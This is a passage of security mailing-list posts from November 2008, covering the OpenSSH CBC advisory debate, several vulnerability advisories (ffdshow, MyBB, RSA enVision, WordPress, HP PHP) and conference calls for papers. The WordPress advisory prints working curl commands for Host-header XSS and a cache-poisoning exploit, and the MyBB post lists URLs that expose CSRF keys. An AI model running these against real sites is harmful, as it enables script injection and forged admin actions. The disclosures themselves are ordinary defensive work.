Re: Re: OpenSSH security advisory: cbc.adv
What documents have you been reading? Take a look at the actual vulnerability advisory. http://www.cpni.gov.uk/Docs/Vulnerability_Advisory_SSH.txt Or the original posting by OpenSSH http://www.securityfocus.com/archive/1/498558/30/0/threaded Where is there any condition related to National Security? If you read the vulnerability advisory you would see that the problem is a design flaw in the SSH specification. OpenSSH was merely used as an example of an implementation of SSH written to implement the specification. It only takes a few seconds to realise that SSH is used in critical systems. We have seen in recent weeks and months that we are all vulnerable to the security of the banking systems. Anyone who uses online banking makes use of systems that include SSH. Do the oil companies have a private network for ordering stocks? What about weather stations or tidal guages, are they on private networks? Are there any ISPs who don't use remote mangement? on 24/11/08 8:04 PM, [EMAIL PROTECTED] wrote: Hey! They put a condition because of National Security. Should that mean that they use OpenSSH in National Security-sensitive applications (interesting ;););))? If so, should that mean that they implicitely recognize the very good work done by the community? If so, why not act politely with the community and share knowledge? This would make the software better, so that they could still use it in their applications. How can't they understand that? Why not just share the knowledge and just ask for some time (fixed amount? or just when a solution will be found) before public release of the details of the attacks? Why not release the details and switch to another system if OpenSSH is not what they need anymore? So one more entity that just want to benefit from FOSS, but not contribute... If I were the developpers, then I would just retaliate (humoristically) by sending them a similar (fake)-contract/NDA, asking them not to use OpenSSH, but share National Sensitive information. In other words, just ask them to share THEIR knowledge without US providing our tools. There are some times where I hate the BSD licence, because it does not force people to cooperate! (even if I don't think any other licence would help here...) My 2 cents and sorry for the off-topic subject... Cheers GM -- Guillaume MULLER Post-Doc - Sala C2-50 Laboratório de Técnicas Inteligentes (LTI) Depto. Eng. Computação e Sistemas Digitai(PCS) Escola Politécnica da Universidade de São Paulo Av. Prof. Luciano Gualberto, 158 travessa 3 05508-900 - São Paulo - SP - Brasil Tel: +55 11 3091 5397 http://www.lti.pcs.usp.br/~guillaume
Re: OpenSSH security advisory: cbc.adv
On Mon, Nov 24, 2008 at 11:39 PM, Damien Miller [EMAIL PROTECTED] wrote: On Mon, 24 Nov 2008, Nick Boyce wrote: Could someone please help the uncomprehending [i.e. me :-)] understand why or whether this is anything to be worried about at all ? Yes, the attack is very unlikely to work against an interactive connection. The usage pattern where the attack is most likely to succeed is where an automated connection is configured to retry indefinitely in the event of errors. In this case, it might be possible to recover as much as 14 bits of plaintext per hour [...] Given the amount of data pumped down the typical automated connection per hour, this is hardly anything to worry about .. surely ? That depends on the data that is being transferred. If it includes sensitive information, then this leakage rate might be unacceptable. [...] We provide this information so you can decide whether this attack is likely to succeed in your environment. Thanks - I appreciate your post and clarification. To be clear, I wasn't seeking to dispute your original post in any way - rather I figured many of us non-cryptographers would like to be *very* sure exactly what the exposure is, given that a weakness in SSH protocol is often the cause of much fear, many missed meals and remedial steps taken hurriedly :) The original CPNI bulletin is less than helpful in stating : The severity is considered to be potentially HIGH due to the 32 bits of plaintext that can be recovered. leaving me wondering how to reconcile severity HIGH with 32 bits of plaintext can be recovered. Ignoring the attack success probability, I glean from your explanation that there is only really a problem if, say, the SSH connection transfers a simple 1, 2, 3 or 4 byte value which reveals a secret. at present we do not feel that this issue is serious enough to make an emergency release Maybe this was always clear, but along with that reassurance I guess you would recommend we all take your stated remedial action : [place] the following directive in sshd_config and ssh_config: Ciphers aes128-ctr,aes256-ctr,arcfour256,arcfour,aes128-cbc,aes256-cbc at the very next maintenance opportunity, on the grounds that it can't hurt, and can only help ? For instance, (and my apologies for not having looked in any detail at possible compatibility issues), would it be fair to say the popular PuTTY-client-with-OpenSSH-server scenario would be fine after the above config change ? Cheers Nick Boyce -- Science is the poetry of reality -- Richard Dawkins
Re: OpenSSH security advisory: cbc.adv
On Mon, 24 Nov 2008, Nick Boyce wrote: [ahem] ... Sorry to be dumb, but ... On Fri, Nov 21, 2008 at 10:19 AM, Damien Miller [EMAIL PROTECTED] wrote: Based on the description contained in the CPNI report and a slightly more detailed description forwarded by CERT this issue appears to be substantially similar to a known weakness in the SSH binary packet protocol first described in 2002 by Bellare, Kohno and Namprempre[2]. The new component seems to be an attack that can recover 14 bits of plaintext with a success probability of 2^-14 Could someone please help the uncomprehending [i.e. me :-)] understand why or whether this is anything to be worried about at all ? Quick calculator session : 2^(-18) = 0.03814697265625 2^(-14) = 0.6103515625 So there is a vanishingly small probability that a Bad Guy may discover less than 2 characters from my command-line, every time they try this attack. And each time they fail, my connection gets rudely chopped. Two characters won't help them much. They'd need to succeed about ten times per typed command-line to snoop on most of my sessions. This weakness is surely of no conceivable use to a Bad Guy ? Yes, the attack is very unlikely to work against an interactive connection. The usage pattern where the attack is most likely to succeed is where an automated connection is configured to retry indefinitely in the event of errors. In this case, it might be possible to recover as much as 14 bits of plaintext per hour (assuming a very fast 10 connections per second). Implementing a limit on the number of connection retries (e.g. 256) is sufficient to render the attack infeasible for this case. Given the amount of data pumped down the typical automated connection per hour, this is hardly anything to worry about .. surely ? That depends on the data that is being transferred. If it includes sensitive information, then this leakage rate might be unacceptable. On the other hand, I expect that most people aren't running automated transfers that will retry enough for the attack to become feasible. We provide this information so you can decide whether this attack is likely to succeed in your environment. -d
CanSecWest 2009 CFP (March 18-20 2009, Deadline December 8 2008)
Call For Papers The CanSecWest 2009 CFP is now open. Deadline is December 8th, 2008. CanSecWest CALL FOR PAPERS VANCOUVER, Canada -- The tenth annual CanSecWest applied technical security conference - where the eminent figures in the international security industry will get together share best practices and technology - will be held in downtown Vancouver at the the Sheraton Wall Centre on March 18-20, 2009. The most significant new discoveries about computer network hack attacks and defenses, commercial security solutions, and pragmatic real world security experience will be presented in a series of informative tutorials. The CanSecWest meeting provides international researchers a relaxed, comfortable environment to learn from informative tutorials on key developments in security technology, and collaborate and socialize with their peers in one of the world's most scenic cities - a short drive away from one of North America's top skiing areas. The CanSecWest conference will also feature the availability of the Security Masters Dojo expert network security sensei instructors, and their advanced, and intermediate, hands-on training courses - featuring small class sizes and practical application exercises to maximize information transfer. We would like to announce the opportunity to submit papers, and/or lightning talk proposals for selection by the CanSecWest technical review committee. This year we will be doing one hour talks, and some shorter talk sessions. Please make your paper proposal submissions before December 8th, 2008. Some invited papers have been confirmed, but a limited number of speaking slots are still available. The conference is responsible for travel and acomodations for the speakers. If you have a proposal for a tutorial session then please email a synopsis of the material and your biography, papers and, speaking background to secwest09 [at] cansecwest.com . Only slides will be needed for the March paper deadline, full text does not have to be submitted - but will be accepted if available. This year we will be opening up the presentation guidelines to include talks not in English (particularly Chinese) which we will offer to translate for the speaker if they are not a native English speaker. The CanSecWest 2009 conference consists of tutorials on technical details about current issues, innovative techniques and best practices in the information security realm. The audiences are a multi-national mix of professionals involved on a daily basis with security work: security product vendors, programmers, security officers, and network administrators. We give preference to technical details and new education for a technical audience. The conference itself is a single track series of presentations in a lecture theater environment. The presentations offer speakers the opportunity to showcase on-going research and collaborate with peers while educating and highlighting advancements in security products and techniques. The focus is on innovation, tutorials, and education instead of product pitches. Some commercial content is tolerated, but it needs to be backed up by a technical presenter - either giving a valuable tutorial and best practices instruction or detailing significant new technology in the products. Paper proposals should consist of the following information: 1. Presenter, and geographical location (country of origin/passport) and contact info (e-mail, postal address, phone, fax). 2. Employer and/or affiliations. 3. Brief biography, list of publications and papers. 4. Any significant presentation and educational experience/background. 5. Topic synopsis, Proposed paper title, and a one paragraph description. 6. Reason why this material is innovative or significant or an important tutorial. 7. Optionally, any samples of prepared material or outlines ready. 8. Will you have full text available or only slides? 9. Language of preference for submission. 10. Please list any other publications or conferences where this material has been or will be published/submitted. Please include the plain text version of this information in your email as well as any file, pdf, sxw, ppt, or html attachments. Please forward the above information to secwest09 [at] cansecwest.com to be considered for placement on the speaker roster, or have your lightning talk scheduled. If you contact anyone else at our organization please ensure you also cc the submission address with your proposal or it may be omitted from the review process. cheers, --dr -- World Security Pros. Cutting Edge Training,
Re: [SVRT-05-08] Critical BoF vulnerability found in ffdshow affecting all internet browsers (SVRT-Bkis)
Good day. Mon, Nov 24, 2008 at 03:17:05PM +0700, svrt wrote: In Oct 2008, SVRT-Bkis has detected a serious buffer overflow vulnerability in ffdshow which affects all available internet browsers. ^^^ Really? And links, elinks, lynx, dillo and others are affected too? What about my Firefox that (I assume) has no ffdshow code inside it and there are no ffdshow-related plugins coupled to it? Is it vulnerable? I am really appreciate that you're searching for the issues and releasing advisories -- thanks for doing this! But, please, use the appropriate wording, or your advisories will lead to controversial feelings. Sorry for being a bit bluffy :( -- Eygene
Re: [SVRT-05-08] Critical BoF vulnerability found in ffdshow affecting all internet browsers (SVRT-Bkis)
The report is for ffdshow, but the referred URL is to ffdshow-tryout. I wonder if they are the same. Cheers Nam On Mon, 24 Nov 2008 15:17:05 +0700 svrt [EMAIL PROTECTED] wrote: 1. General Information ffdshow is a DirectShow filter and VFW codec for many audio and video formats, such as DivX, Xvid and H.264. It is the most popular audio and video decoder on Windows. Besides a stand-alone setup package, ffdshow is often included in almost all codec pack software such as K-lite Codec Pack, XP Codec Pack, Vista Codec Package, Codec Pack All in one,. In Oct 2008, SVRT-Bkis has detected a serious buffer overflow vulnerability in ffdshow which affects all available internet browsers. Taking advantage of the flaw, hackers can perform remote attack, inject viruses, steal sensitive information and even take control of the victim's system. Since ffdshow is an open source software (can be found at http://sourceforge.net/projects/ffdshow-tryout), we have contacted the developing team and they have patched the vulnerability in the latest version of ffdshow. Details : http://security.bkis.vn/?p=277 SVRT Advisory : SVRT-05-08 Initial vendor notification : 13-11-2008 Release Date : 24-11-2008 Update Date : 24-11-2008 Discovered by : SVRT-Bkis Security Rating : Critical Impact Remote : Code Execution Affected Software : ffdshow ( rev2347 20081123) 2. Technique Description The flaw occurs when ffdshow works with a media stream (e.g. http://[website]/test.avi). On parsing an overly long link, ffdshow would encounter a buffer overflow error as the memory is not allocated and controlled well. ffdshow is in fact a codec component for decoding multimedia formats so it must be used via some media player; the default program is Windows Media Player (wmp). Due to this reason, all internet browsers that support wmp plug-in are influenced by this vulnerability, such as Internet Explorer, Firefox, Opera, Chrome... In order to exploit, hackers trick users into visiting a website containing malicious code. If successful, malicious code would be executed without any users' further interaction. Hackers can then take complete control of the system. 3. Solution As for the seriousness of the vulnerability, it has been patched in the latest version of ffdshow by the developing team of the software. Bkis Internetwork Security Center highly recommends that users should update ffdshow to the latest version here: http://sourceforge.net/project/showfiles.php?group_id=173941package_id=199416release_id=439904 At the moment, there are a lot of software packages packing ffdshow that haven't been updated. On account of this, users should also update the ffdshow latest versions: - K-Lite Codec Pack (lastest version). - XP Codec Pack (lastest version). - Vista Codec Package (lastest version). - Codec Pack All in one (lastest version). - Storm Codec Pack (lastest version). - And many other software Codec packages using ffdshow. In addition, software producers that make use of ffdshow in their products should also update these products with the latest version of ffdshow. 4. Credits Thanks Nguyen Anh Tai for working with SVRT-Bkis. Bach Khoa Internetwork Security Center (BKIS) Hanoi University of Technology (Vietnam) Email : [EMAIL PROTECTED] Website : www.bkav.com.vn WebBlog : security.bkis.vn Our PGP : http://security.bkis.vn/policy/pgp/SVRT-Bkis.gpg -- Nam
Re: OpenSSH security advisory: cbc.adv
Nick Boyce [EMAIL PROTECTED] wrote: [ahem] ... Sorry to be dumb, but ... On Fri, Nov 21, 2008 at 10:19 AM, Damien Miller [EMAIL PROTECTED] wrote: Based on the description contained in the CPNI report and a slightly more detailed description forwarded by CERT this issue appears to be substantially similar to a known weakness in the SSH binary packet protocol first described in 2002 by Bellare, Kohno and Namprempre [2]. The new component seems to be an attack that can recover 14 bits of plaintext with a success probability of 2^-14 Could someone please help the uncomprehending [i.e. me :-)] understand why or whether this is anything to be worried about at all ? Quick calculator session : 2^(-18) = 0.03814697265625 2^(-14) = 0.6103515625 So there is a vanishingly small probability that a Bad Guy may discover less than 2 characters from my command-line, every time they try this attack. And each time they fail, my connection gets rudely chopped. Two characters won't help them much. They'd need to succeed about ten times per typed command-line to snoop on most of my sessions. This weakness is surely of no conceivable use to a Bad Guy You could still use this attack in DOS scenarios. Through those connection terminations the service quality is reduced. You could e.g. lock admins out (prevent security updates, have more time for time- consuming attacks which would otherwise be reset from time to time by admins, ...) or reduce transmission rate of security logs by machines without harddisk using SSH like a VPN to send logs to some central server or in general could inhibit many vital processes based on SSH. Thus you could increase your chances of other attacks. And of course you can attack the service ssh itself. (all those could be prevented by the use of a VPN - but most people won't take this effort if they don't really need to do so and therefore don't have one set up when they would need it) Best regards Fabian
MyBB 1.4.3 my_post_key Disclosure Vulnerability
## #MyBB 1.4.3 my_post_key Disclosure Vulnerability by NBBN (http://nbbnsblog.co.cc) # ## Vendor: http://mybboard.net Date: November 25, 2008 These URLs contains my_post_key. Moderators and admins use these sometimes, depending on what they want to do with a thread. my_post_key is used to perform various actions and to prevent CSRF. These pages shows the posts of the users. If some of these posts have pictures, the referrer will be transfered to the server of the images. #Vuln URLs# http://localhost/mybb/moderation.php?action=mergepoststid=1modtype=threadmy_post_key=[key] # http://localhost/mybb/moderation.php?action=splittid=1modtype=threadmy_post_key=[key] # http://localhost/mybb/moderation.php?action=deletepoststid=1modtype=threadmy_post_key=[key] # Finally, an attacker has the postkey, and can perform some interesting moderator or administrator actions with csrf.
New tool and paper for Oracle forensics...
Hey all, I've just posted a new tool and paper for Oracle forensics. The tool, orablock, allows a forensic investigator to dump data from a cold Oracle data file - i.e. there's no need to load up the data file in the database which would cause the data file to be modified, so using orablock preserves the evidence. Orablock can also be used to locate stale data - i.e. data that has been deleted or updated. It can also be used to dump SCNs for data blocks which can be useful during the examination of a compromised Oracle box. Indeed, this is the subject of the paper Oracle Forensics Part 7: Using the Oracle System Change Number in Forensic Examinations. Both the tool (which compiles on Linux, Mac OS X and Windows) and the paper are available from http://www.databasesecurity.com/. Cheers, David Litchfield NGSSoftware Ltd http://www.ngssoftware.com/ -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402
Re: OpenSSH security advisory: cbc.adv
Maybe this was always clear, but along with that reassurance I guess you would recommend we all take your stated remedial action : [place] the following directive in sshd_config and ssh_config: Ciphers aes128-ctr,aes256-ctr,arcfour256,arcfour,aes128-cbc,aes256-cbc at the very next maintenance opportunity, on the grounds that it can't hurt, and can only help ? It can possibly hurt very much - if ctr mode is subject to a different vulnerablility. There has been much discussion of ctr mode having *possible* issues, although nothing I know of published directly about ssh. On the other hand, we have a national security agency who refuses full disclosure, raising a vulnerability and pointing to a switch to counter mode. Perhaps this is to prevent the low likelyhood but possible attack they have found, or perhaps it is to encourage a hasty switch to counter mode which is more convenient for national security reasons. I don't honestly know - the only REAL info on the subject I've seen has come from djm. You decide who you trust. personally, I won't be making that change hastily anywhere - Nothing I have is directly threatened by this attack, so I can wait until someone figures out the jist of it and implents an appropriate countermeasure, and I see some legitimate peer review on the topic as opposed to FUD spreading. I frankly trust the OpenSSH developers a lot more than I trust ssh.com or a puppet state no such agency acting as worn out lapdog for the sorts of people that implement things like the patriot act. People who will not share information with the developers of the software should always be suspect. They have no reason not to without a hidden agenda. -Bob
[security bulletin] HPSBTU02382 SSRT080132 rev.1 - HP Secure Web Server for Tru64 UNIX or Internet Express for Tru64 UNIX running PHP, Remote Denial of Service (DoS) or Arbitrary Code Execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01599836 Version: 1 HPSBTU02382 SSRT080132 rev.1 - HP Secure Web Server for Tru64 UNIX or Internet Express for Tru64 UNIX running PHP, Remote Denial of Service (DoS) or Arbitrary Code Execution NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2008-11-25 Last Updated: 2008-11-25 Potential Security Impact: Remote Denial of Service (DoS) or arbitrary code execution. Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified in PHP running on the HP Secure Web Server for Tru64 UNIX or Internet Express for Tru64 UNIX. The vulnerability could be exploited remotely to cause a Denial of Service (DoS) or to execute arbitrary code. References: CVE-2008-3658 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Secure Web Server for Tru64 UNIX v 6.8.0 or earlier HP Internet Express for Tru64 UNIX v 6.8 HP Internet Express for Tru64 UNIX v 6.7 HP Internet Express for Tru64 UNIX v 6.6 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2008-3658 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. RESOLUTION HP is releasing the following Early Release Patch (ERP) kits publicly for use by any customer until updates are available in mainstream release patch kits. The resolutions contained in the ERP kits are targeted for availability in the following mainstream kit: HP Internet Express for Tru64 UNIX v 6.9 The ERP kits use dupatch to install and will not install over any Customer Specific Patches (CSPs) that have file intersections with the ERPs. Contact your service provider for assistance if the installation of the ERPs is blocked by any of your installed CSPs. The ERP kit provides apache-tomcat-5.5.26, apache_1.3.39, httpd-2.2.6, php-4.4.9 souces and licenses. HP Secure Web Server for Tru64 UNIX v 6.8.0 or earlier, HP Internet Express for Tru64 UNIX v 6.6, v 6.7, or v 6.8 PREREQUISITE: HP Tru64 UNIX v 5.1B-4 PK6 (BL27) or v 5.1B-3 PK5 (BL26) Name: SWS-681.tar.gz Location: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=SWS-6.81; show=replacehttp://www.itrc.hp.com/service/patch/patchDetail.do?patchid=SWS-681 MD5 checksums are available from the ITRC patch database main page. From the patch database main page, click Tru64 UNIX, then click verifying MD5 checksums under useful links. PRODUCT SPECIFIC INFORMATION HISTORY Version:1 (rev.1) - 25 November 2008 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers
Re: Microsoft VISTA TCP/IP stack buffer overflow
So, let me try and understand this. According to what you have written, and the MSDN documentation on this CreateIpForwardEntry2 call, you need to be (at least) a member of the Administrators group. So how is this security vulnerability any different to me creating a program, which will require the same Administrative rights, to say, wipe the boot configuration file?
RSA EnVision Remote Password Disclosure
I Reference Title: RSA EnVision Remote Password Disclosure URL: http://www.secfault.org/?p=78 II. BACKGROUND RSA EnVision, a product of RSA Security, is a platform allowing gathering and analysis of security events and logs. RSA Security is a subsdiary company of EMC Corporation. III. DESCRIPTION The RSA EnVision platform provides a web console which enables administration of the solution and analysis of security events. A vulnerability exists in this web application, allowing a remote anonymous attacker to retrieve the hash of the password used for authentication. Using a dictionnary or a bruteforce attack against this hash, a remote attacker can gain administration privilege on the EnVision web console. This vulnerability is due to a lack of access control on the user profile functionnality. Step to reproduce: The step to reproduce the vulnerability will be disclosure Novembre 28 2008. IV. IMPACT Successful exploitation allows remote attackers to gain access to hash of password used to authenticate users of the web console. Using a dictionnary or a bruteforce attack against the retrieved hash, a remote attacker can gain administration privilege on the EnVision web console. V. PRODUCT AFFECTED The vulnerability was sucessfully exploited on enVision v3.7.0 Build: 0169. EMC has reported the following versions to be affected: RSA EnVision 3.5.0, 3.5.1, 3.5.2 and 3.7.0 VI. REMEDIATION Apply the vendor patch corresponding to your version of RSA EnVision: https://knowledge.rsasecurity.com/ VII. DISCLOSURE TIMELINE 10/30/2008 Initial vendor notification 10/31/2008 Initial vendor response 11/21/2008 Patch release and coordinated public advisory disclosure 11/28/2008 Detailed vulnerability information disclosure VIII. VENDOR REFERENCE EMC Security Alert (ESA) identifier : ESA-08-017 IX. CREDIT This vulnerability was discovered by Nicolas Viot [EMAIL PROTECTED] Intrinsec is a french company specialized in business continuity and security : http://www.intrinsec.com
WordPress XSS vulnerability in RSS Feed Generator
= noXSS.org Security Advisory == Advisory: WordPress XSS vulnerability in RSS Feed Generator Author: Jeremias Reith [EMAIL PROTECTED] Published: 2008/11/25 Affected: WordPress 2.6.5 Summary === WordPress prior to v2.6.3 fails to sanitize the Host header variable correctly when generating RSS feeds and is therefore prune to XSS attacks. Web Sites running in a name based virtual hosting setup are not affected as long as they are not the default virtual host. Moreover we only found installations running on the Apache web server to be affected. Vulnerability Details = The function self_link() in wp-includes/feed.php is used to generate absolute URLs for the atom:link tag in ATOM and RSS 2.0 feeds: function self_link() { echo 'http' . ( $_SERVER['https'] == 'on' ? 's' : '' ) . '://' . $_SERVER['HTTP_HOST'] . wp_specialchars(stripslashes($_SERVER['REQUEST_URI']), 1); } The function does not sanitize the HTTP_HOST variable in any way but WordPress replaces all $_SERVER variables with escaped ones in wp-settings.php: $_SERVER = add_magic_quotes($_SERVER); In almost all setups add_magic_quotes() runs mysql_real_escape_string() over the elements and returns the modified array. Unfortunately this escaping method is not safe in markup context. PoC The Apache web server only disallows '/', '\' and '..' within the host header. The header can therefore contain markup making the following PoC possible: curl -H Host: \body onload=alert(String.fromCharCode(88,83,83)) \ http://www.example.org/blog/feed The given example request will return (without additional newlines): -- snip -- ... atom:link href=http://\; body onload=alert(String.fromCharCode(88,83,83)) /blog/feed rel=self type=application/rss+xml / ... -- snip -- The embedded JavaScript will be executed in Firefox 3.0.4 due to the triggered switch to Quirks mode. Exploit === The following exploit is a semi-stored XSS attack and has been tested with the following setup: - Apache 2.x with IP based virtual hosting - Wordpress 2.6.3 installed in /blog/ - WP Super Cache 0.84 - Firefox 3.0.4 WP Super Cache is a popular WordPress plugin that adds static file caching to WordPress. It greatly increases performance and is often used. It saves generated pages in the wp-content/cache directory and adds mod_rewrite rules to serve cached pages statically. Issuing a malicious request to a vulnerable WordPress installation will lead to a file containing the XSS to be generated and placed within the document root. Request: curl -H Host: \body onload=alert(String.fromCharCode(88,83,83)) \ http://www.example.org/blog/feed Generated file: http://example.org/blog/wp-content/cache/wp-cache-#md5sum#.html Firefox will execute the embedded JavaScript even tough the feed is XML because the file is served as text/html. The only missing the step is the calculation cached file's MD5 sum. The following code generates the MD5 checksum: php -r 'echo md5(\body onload=alert(String.fromCharCode(88,83,83)). /blog/feed), \n;' In the default setup the MD5 sum can be generated by concatenating the contents of HTTP_HOST and REQUEST_URI resulting in 0d2ca4617758433a7864d57493be2c5b for the given example. This file can be accessed until the cache expiration mechanism removes it. The default expire time is 3600 seconds. Vendor Response === 2008-11-17 Reported to vendor 2008-11-17 Initial response from vendor 2008-11-25 Release of version 2.6.5 smime.p7s Description: S/MIME cryptographic signature
Re: Microsoft VISTA TCP/IP stack buffer overflow
Administrator lives in Ring 3 while this crash happens in Ring 0. Nobody, not even Admin shouldn't be able to corrupt kernel space. It's not a security issue per se - it's just a bug. [EMAIL PROTECTED] wrote: So, let me try and understand this. According to what you have written, and the MSDN documentation on this CreateIpForwardEntry2 call, you need to be (at least) a member of the Administrators group. So how is this security vulnerability any different to me creating a program, which will require the same Administrative rights, to say, wipe the boot configuration file?
[CFP] FRHACK 01 Call For Papers (save the dates!)
[CFP] FRHACK 01 Call For Papers ## ### # ### # ### ## # ### ### ### ### # ### ### ### ### ### ### ### ### ######## ### ## ## # ### ### # ### ### # ### ### # ### ### ### #### ## ## #### ### ### ### ## ### FRHACK: By Hackers, For Hackers! http://www.frhack.org ## ++ + FRHACK 01 + Call For Papers + September 7-8, 2009, at the Great Kursaal Hall of Besançon, France. ++ Do you like good wine, french bread food, strikes and the french kiss? If so, you will love FRHACK! [ - Introduction - ] FRHACK is the First International IT Security Conference, by hackers - for hackers, in France! FRHACK is not commercial - but - highly technical. Target Audience: Security Officers, Security Professionals and Product Vendors, IT Decision Makers, Policy Makers, Security-, Network-, and Firewall Administrators, Teachers, Academic Researchers and Software Developers. The FRHACK Team (TFT) encourages speakers to present new and interesting projects for FRHACK 01 and will give preferential treatment to submissions that have not been presented at other conferences. Further, TFT invites any individual who has not spoken at a conference before to submit a talk and attempt to make FRHACK their inaugural event! TFT encourages girls passionated by IT Security to submit papers, as TFT will offer a prize to the Best IT Security girl of the year to reward innovation. Papers can be submitted in English and/or French. The conference language is either English or French. Conference will be held in Besançon - EU, East of France, closer to Switzerland, and aims to get together industry, government, academia and underground hackers to share knowledge and leading-edge ideas about information security and everything related to it. FRHACK will feature national and international speakers and attendees with a wide range of skills. The atmosphere is favorable to present all facets of computer security subject and will be a great opportunity to network with like-minded people and enthusiasts. [ - The venue - ] FRHACK 01 (1st edition) will take place at the Great Kursaal Hall of Besançon with capacity for up to 1400 people. [*] About Besançon (stolen from http://en.wikipedia.org/wiki/Besan%C3%A7on) Besançon is the capital and principal city of the Franche-Comté region in eastern France. Located close to the border with Switzerland, it is the capital of the Doubs department. As well as being famed as one of France's finest villes d'art (art cities), Besançon is the seat of one of France's older universities, of France's National School of Mechanics and Micromechanics, and one of the best known French language schools in France, the CLA. It is also reputed to be France's most environmentally-friendly city, with a public transport network that has often been cited as a model. On account of the topography, the historic city centre lies at the edge of the modern city, and hiking tracks lead straight from the centre and up into the surrounding hills. The Citadel of Besançon dates back to the Celtic era. In his De Bello Gallicum, Julius Caesar already said about the fortress of Vesontio (celtic name of Besançon) that it was one of the best defensive sites he had ever seen. Besançon is situated at the crossing of two major lines of communication, the NE-SW route, following the valley of the river Doubs, and linking Germany and North Europe with Lyon and southwest Europe, and the N-S route linking northern France and the Netherlands with Switzerland. A key staging post on the Strasbourg-Lyon (Germany-Spain) route, it also has direct high-speed train (TGV) links with Paris, Charles de Gaulle International Airport, and Lille. Unusually for a town of its size, it does not have a commercial airport,